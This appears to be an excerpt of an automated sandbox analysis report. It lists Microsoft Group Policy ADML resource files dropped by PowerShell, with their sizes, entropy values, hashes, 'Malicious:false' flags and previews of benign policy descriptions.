                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Cat_OfflineFiles">Offline Files</string>.. <string id="Lbl_Fail">Never go offline</string>.. <string id="Lbl_FullSync">Full</string>.. <string id="Lbl_QuickSync">Quick</string>.. <string id="Lbl_WorkOffline">Work offline</string>.. <string id="Pol_AlwaysPinSubFolders">Subfolders always available offline</string>.. <string id="Pol_AlwaysPinSubFolders_Help">Makes subfolders available offline whenever their parent folder is made available offline.....This setting automatically extends the
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (447), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):15965
                                                                                          Entropy (8bit):4.663039279812552
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="P2P_Disabled">Turn off Microsoft Peer-to-Peer Networking Services</string>.. <string id="P2P_Disabled_Explain">This setting turns off Microsoft Peer-to-Peer Networking Services in its entirety, and will cause all dependent applications to stop working.....Peer-to-Peer protocols allow for applications in the areas of RTC, collaboration, content distribution and distributed processing.....If you enable this setting, peer-to-peer protocols will be turned off.....If you disable this setting or do not configure it,
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1084
                                                                                          Entropy (8bit):5.01040774159096
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ParentalControls">Family Safety</string>.. <string id="ParentalControls_EnableOnDomain_help">This policy setting allows you to configure the Family Safety feature.....If you enable this policy setting, the Family Safety control panel is visible on a domain joined computer.....If you disable or do not configure this policy setting, the Family Safety control panel is not visible on a domain joined computer.</string>.. <string id="ParentalControls_EnableOnDomain">Make Family Safety control panel visible on a
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (754), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):24638
                                                                                          Entropy (8bit):4.564624284444478
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>BranchCache</displayName>.. <description>BranchCache enables clients to securely retrieve content from within the branch office instead of having to retrieve it from the server hosting the content. Depending on the deployment mode, the content can be retrieved from other clients in the branch office or from a hosted cache server in the branch. A client can only retrieve content from within the branch if it is authorized by the server to do so. The use of BranchCache reduces costs on the wide area network (WAN) link that connects your branch offices to the data center or headquarters and increases download speeds for content that has already been downl
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1208
                                                                                          Entropy (8bit):5.027249517124002
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PenTraining">Tablet PC Pen Training</string>.. <string id="PenTrainingOff">Turn off Tablet PC Pen Training</string>.. <string id="PenTrainingOff_Help_LOCALMACHINE">Turns off Tablet PC Pen Training.....If you enable this policy setting, users cannot open Tablet PC Pen Training.....If you disable or do not configure this policy setting, users can open Tablet PC Pen Training.</string>.. <string id="PenTrainingOff_Help_USER">Turns off Tablet PC Pen Training.....If you enable this policy setting, users ca
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (577), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8181
                                                                                          Entropy (8bit):4.68291957028103
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="BootScenarioCategory">Windows Boot Performance Diagnostics</string>.. <string id="BootScenarioExecutionPolicyExplain">Determines the execution level for Windows Boot Performance Diagnostics.....If you enable this policy setting, you must select an execution level from the dropdown menu. If you select problem detection and troubleshooting only, the Diagnostic Policy Service (DPS) will detect Windows Boot Performance problems and attempt to determine their root causes. These root causes will be logged to the eve
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1205
                                                                                          Entropy (8bit):4.988086677223878
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PerfTrackCategory">Windows Performance PerfTrack</string>.. <string id="PerfTrackScenarioExecutionPolicyExplain">This policy setting specifies whether to enable or disable tracking of responsiveness events.....If you enable this policy setting, responsiveness events are processed and aggregated. The aggregated data will be transmitted to Microsoft through SQM.....if you disable this policy setting, responsiveness events are not processed.....If you do not configure this policy setting, the DPS will enable Wind
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (389), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):29740
                                                                                          Entropy (8bit):4.822333468541642
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ACCriticalSleepTransitionsDisable">Turn on the ability for applications to prevent sleep transitions (plugged in)</string>.. <string id="ACHibernateTimeOut">Specify the system hibernate timeout (plugged in)</string>.. <string id="ACPowerButtonAction">Select the Power button action (plugged in)</string>.. <string id="ACPromptForPasswordOnResume">Require a password when a computer wakes (plugged in)</string>.. <string id="ACSleepButtonAction">Select the Sleep button action (plugged in)</string>..
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8601
                                                                                          Entropy (8bit):4.7004620993687665
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<policyDefinitionResources xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" revision="1.0" schemaVersion="1.0" xmlns="http://www.microsoft.com/GroupPolicy/PolicyDefinitions">.. <displayName>Windows PowerShell</displayName>.. <description>This file contains the configuration options for Windows PowerShell</description>.. <resources>.. <stringTable>.. <string id="AllScripts">Allow all scripts</string>.. <string id="AllScriptsSigned">Allow only signed scripts</string>.. <string id="EnableScripts">Turn on Script Execution</string>.. <string id="EnableScripts_Explain">This policy setting lets you configure the script execution policy, controlling which scripts are allowed to run.....If you enable this policy setting, the scripts selected in the drop-down list are allowed to run.....The "Allow only signed scripts" policy setting allows scripts to execute only if they are signed
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5301
                                                                                          Entropy (8bit):4.592135641503131
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableBackupRestore">Prevent restoring previous versions from backups</string>.. <string id="DisableBackupRestore_Help">This policy setting lets you suppress the Restore button in the previous versions property page when the user has selected a previous version of a local file, in which the previous version is stored on a backup.....If you enable this policy setting, the Restore button is disabled when the user selects a previous version corresponding to a backup.....If you disable this policy setting, the Re
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (568), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):33066
                                                                                          Entropy (8bit):4.630945231898182
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8" standalone="yes"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowWebPrinting">Activate Internet printing</string>.. <string id="AllowWebPrinting_Help">Internet printing lets you display printers on Web pages so that printers can be viewed, managed, and used across the Internet or an intranet..... If you enable this policy setting, Internet printing is activated on this server..... If you disable this policy setting or do not configure it, Internet printing is not activated..... Internet printing is an extension of Internet In
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (640), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):14598
                                                                                          Entropy (8bit):4.638367767119586
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8" standalone="yes"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0">.. <displayName>Printing Group Policies</displayName>.. <description>Printing Group Policies valid on all Windows flavors except ARM</description>.. <resources>.. <stringTable>.. <string id="RegisterSpoolerRemoteRpcEndPoint">Allow Print Spooler to accept client connections</string>.. <string id="RegisterSpoolerRemoteRpcEndPoint_Help">This policy controls whether the print spooler will accept client connections.....When the policy is unconfigured or enabled, the spooler will always accept client connections.....When the policy is disabled, the spooler will not accept client connections nor allow users to share printers. All printers current
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (424), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):7022
                                                                                          Entropy (8bit):4.658208655049282
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Programs">Programs</string>.. <string id="NoProgramsCPL">Hide the Programs Control Panel</string>.. <string id="NoProgramsCPL_Help">This setting prevents users from using the Programs Control Panel in Category View and Programs and Features in Classic View... ..The Programs Control Panel allows users to uninstall, change, and repair programs, enable and disable Windows Features, set program defaults, view installed updates, and purchase software from Windows Marketplace. Programs published or assigned to
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (366), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4835
                                                                                          Entropy (8bit):4.774670262203608
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PswdSync">Password Synchronization</string>.. <string id="Psync_LoggingLevel">Turn on extensive logging for Password Synchronization</string>.. <string id="Psync_LoggingLevel_Help">This policy setting allows an administrator to turn on extensive logging for Password Synchronization.....If you enable this policy setting, all affected computers that are running Password Synchronization log intermediate steps for password synchronization attempts.....If you disable or do not configure this policy setting, in
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):22100
                                                                                          Entropy (8bit):4.777240545794819
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="QosDBMC_BestEffort_Help">Specifies an alternate Layer-3 Differentiated Services Code Point (DSCP) value for packets with the Best Effort service type (ServiceTypeBestEffort). The Packet Scheduler inserts the corresponding DSCP value in the IP header of the packets.....This setting applies only to packets that conform to the flow specification.....If you enable this setting, you can change the default DSCP value associated with the Best Effort service type.....If you disable this setting, the system uses the default
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (491), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):13725
                                                                                          Entropy (8bit):4.739504626052788
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Rpc">Remote Procedure Call</string>.. <string id="RpcEEInfoOff">Off</string>.. <string id="RpcEEInfoOffWithExc">Off with Exceptions</string>.. <string id="RpcEEInfoOn">On</string>.. <string id="RpcEEInfoOnWithExc">On with Exceptions</string>.. <string id="RpcEnableAuthEpResolution">Enable RPC Endpoint Mapper Client Authentication</string>.. <string id="RpcEnableAuthEpResolution_Help">This policy setting controls whether RPC clients authenticate with the Endpoint Mapper Service when the
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1378
                                                                                          Entropy (8bit):4.961792727852399
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Reliability Analysis Component</displayName>.. <description>Reliability Analysis Component</description>.. <resources>.. <stringTable>.. <string id="RAC">Windows Reliability Analysis</string>.. <string id="ConfigureRacWmi">Configure Reliability WMI Providers</string>.. <string id="ConfigureRacWmi_help">This policy setting allows the Windows Management Instrumentation (WMI) providers Win32_ReliabilityStabilitymetrics and Win32_ReliabilityRecords to provide data to Reliability Monitor in the Action Center control panel, and to respond to WMI requests.....If you enable or do not configure this policy setting, the listed providers will resp
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (563), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2714
                                                                                          Entropy (8bit):4.801755208450146
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">Windows Resource Exhaustion Detection and Resolution</string>.. <string id="WdiScenarioExecutionPolicy">Configure Scenario Execution Level</string>.. <string id="WdiScenarioExecutionPolicyExplain">Determines the execution level for Windows Resource Exhaustion Detection and Resolution.....If you enable this policy setting, you must select an execution level from the dropdown menu. If you select problem detection and troubleshooting only, the Diagnostic Policy Service (DPS) will detect
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (483), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1817
                                                                                          Entropy (8bit):4.807685062167235
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Recovery</displayName>.. <description>Recovery</description>.. <resources>.. <stringTable>.. <string id="WinRE">Recovery</string>.. <string id="ConfigureWinRESetup">Allow restore of system to default state</string>.. <string id="ConfigureWinRESetup_help"> Requirements: Windows 7.. Description: This policy setting controls whether users can access the options in Recovery (in Control Panel) to restore the computer to the original state or from a user-created system image..... If you enable or do not configure this policy setting, the items "Use a system image you created earlier to recover your computer" and "Reinstall Windows" (
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5310
                                                                                          Entropy (8bit):4.781992069178365
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="EE_EnablePersistentTimeStamp">Enable Persistent Time Stamp</string>.. <string id="EE_EnablePersistentTimeStamp_Help">This policy setting allows the system to detect the time of unexpected shutdowns by writing the current time to disk on a schedule controlled by the Timestamp Interval.....If you enable this policy setting, you are able to specify how often the Persistent System Timestamp is refreshed and subsequently written to the disk. You can specify the Timestamp Interval in seconds.....If you disable this
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (455), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):10373
                                                                                          Entropy (8bit):4.861749081876546
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="RA_Logging">Turn on session logging</string>.. <string id="RA_Logging_Help">This policy setting allows you to turn logging on or off. Log files are located in the user's Documents folder under Remote Assistance.....If you enable this policy setting, log files are generated.....If you disable this policy setting, log files are not generated.....If you do not configure this setting, application-based settings are used.</string>.. <string id="RA_Optimize_Bandwidth">Turn on bandwidth optimization</string>..
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (302), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):13642
                                                                                          Entropy (8bit):4.756771021239847
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:EnzGj8hc8ROewd8BWwfZ6P0OuI3CDzGvnt7fdXV/gBLtDNGaUgmGaUTGaUFmGaU6:NtjIvGaUBGaUTGaUEGaUUGaUW
                                                                                          MD5:3C7C9203B770747E42F16415384ACA91
                                                                                          SHA1:577E03EBA471F120DB1A1D96648E18E215C57982
                                                                                          SHA-256:61727D2632E0E816A562C6489E5732206A94D3F3581D35042F72FC03A7ECD3D0
                                                                                          SHA-512:7C3F140959497EC753935942A4CB063BA3D431D1F5C4A6FA16BEBD065DE5280C9C0AC34E2A938E413CC7B68A78D2C33BE73DE58F74B1BD71A4A8DBDD12ABF080
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AccessRights_RebootTime">Set time (in seconds) to force reboot</string>.. <string id="AccessRights_RebootTime_Help">This policy setting configures the amount of time (in seconds) that the operating system waits to reboot in order to enforce a change in access rights to removable storage devices.....If you enable this policy setting, you can set the number of seconds you want the system to wait until a reboot.....If you disable or do not configure this setting, the operating system does not force a reboot.....N
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (331), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):12538
                                                                                          Entropy (8bit):4.768527840947223
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:E4w/xBxQzr/8RRROAHPKc16VcDuJxR1Vi3ia67NitbK0pft+pw7TUlyUAGSJ:wnRRPgHkS9A9D1P
                                                                                          MD5:6B1C987D0C322DD0DD627EC2020F90AC
                                                                                          SHA1:C25254DCB050E342AB84633F084B9ABC06EF9239
                                                                                          SHA-256:EBC840298B0A1FB37F1DB1DF288FC5FAEA981B2F8AE4BE9E0E07D11A1E9E0FB5
                                                                                          SHA-512:915A3DB4C3C0572BE46009BA976FFB606FD304B5908207F288C06DFA6A2281153304E7FF368E446BB8CE5217E0DB4FF849DD2119904007057D85ADEBB9B75325
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MaxGPOScriptWaitPolicy">Specify maximum wait time for Group Policy scripts</string>.. <string id="MaxGPOScriptWaitPolicy_Help">This policy setting determines how long the system waits for scripts applied by Group Policy to run. ....This setting limits the total time allowed for all logon, logoff, startup, and shutdown scripts applied by Group Policy to finish running. If the scripts have not finished running when the specified time expires, the system stops script processing and records an error event.....If y
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (622), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2466
                                                                                          Entropy (8bit):4.781426635707619
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKBtxHxPUNbhQaB6+J5KaeKUYF1vKUYox2P1C9L5GkMo/2VcSurcFV:LeD5pmdtxHxG64MYfYo8NQL8IGrccFV
                                                                                          MD5:BB7C4CF9B3DDFEFAE5FF4C38B5026EB3
                                                                                          SHA1:157C536B83CB87B194C8BF8018A965EF72DC314B
                                                                                          SHA-256:F49034EF8C96F7E5A19AFB7873AFB1A3F289630390E36C163B12FD2DDC15637A
                                                                                          SHA-512:DE9E2E1824A0B9B03AFC476090D361DD5808C6D0B6C8EB70C7DFC590D8B222C78D062CAB2580E8F74F243CD713EB268BFC72BE232698F15CA269EE007F6B41DE
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="SecurityCenter">Security Center</string>.. <string id="SecurityCenter_SecurityCenterInDomain">Turn on Security Center (Domain PCs only)</string>.. <string id="SecurityCenter_SecurityCenterInDomain_Help">This policy setting specifies whether Security Center is turned on or off for computers that are joined to an Active Directory domain. When Security Center is turned on, it monitors essential security settings and notifies the user when the computer might be at risk. The Security Center Control Panel categ
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2056
                                                                                          Entropy (8bit):4.6874178503699655
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKcgWEhQnwgbc+ijJzo/DQxCGgbxCEinEqcN8gUOZFV:LeD5pmkRLRSo/k0V0EvN4CFV
                                                                                          MD5:7CAFF134D90FB9D9BFFD1931A3B7A077
                                                                                          SHA1:6C1305F61CF2978F73F3C8DF3FB7639BC3761863
                                                                                          SHA-256:B102166CF6A473DCE4ADC301156086D0EBA710EFFFA1C4A569EA480994A7F5B4
                                                                                          SHA-512:2D7427C5572797903A6539A872B9AF3062F23BDF24E3004EC61388D321ABBDCF1D063DB00F5703BDC708AA1AE1B5FCF3262F961C3E9CFBC44BFDE8C001A4583D
                                                                                          Malicious:false
